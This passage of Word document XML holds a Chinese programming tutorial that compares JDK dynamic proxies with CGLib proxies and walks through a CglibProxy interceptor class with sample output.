      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>——————————————————————————</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>下一位请登台发言！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>小明：大家好啊！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>大家掌声鼓励！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>——————————————————————————</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>下一位请登台发言！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>小丽：我的意思是，我们要努力建设和谐社会！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>大家掌声鼓励！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理有一个很大的限制，就是它要求目标类必须实现了对应方法的接口，它只能为接口创建代理实例。我们在上文测试类中的</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>newProxyInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法中可以看到，该方法第二个参数便是目标类的接口。如果该类没有实现接口，这就要靠</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="00C764BB" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C764BB">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r w:rsidRPr="00C764BB">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>采用非常底层的字节码技术，可以为一个类创建一个子类，并在子类中采用方法拦截的技术拦截所有父类方法的调用，并顺势植入横切逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>二、接下来我们进行</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理的演示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>首先我们需要导包，我用的包是</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cglib-nodep-2.1_3.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>我们首先创建一个代理创建器</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CglibProxy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>package testAOP.cglib;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.lang.reflect.Method;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import net.sf.cglib.proxy.Enhancer;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import net.sf.cglib.proxy.MethodInterceptor;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import net.sf.cglib.proxy.MethodProxy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public class CglibProxy implements MethodInterceptor{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    Enhancer enhancer = new Enhancer();</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    public Object getProxy(Class clazz) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>设置需要创建的子类</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        enhancer.setSuperclass(clazz);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        enhancer.setCallback(this);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过字节码技术动态创建子类实例</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        return enhancer.create();</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    public Object intercept(Object obj, Method method, Object[] args,</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>            MethodProxy proxy) throws Throwable {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        // TODO Auto-generated method stub</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println("——————————————————————————");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>下一位请登台发言！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标方法调用</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        Object result = proxy.invokeSuper(obj, args);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标方法后执行</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>大家掌声鼓励！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        return result;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }    </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>然后进行测试：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>package testAOP.cglib;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
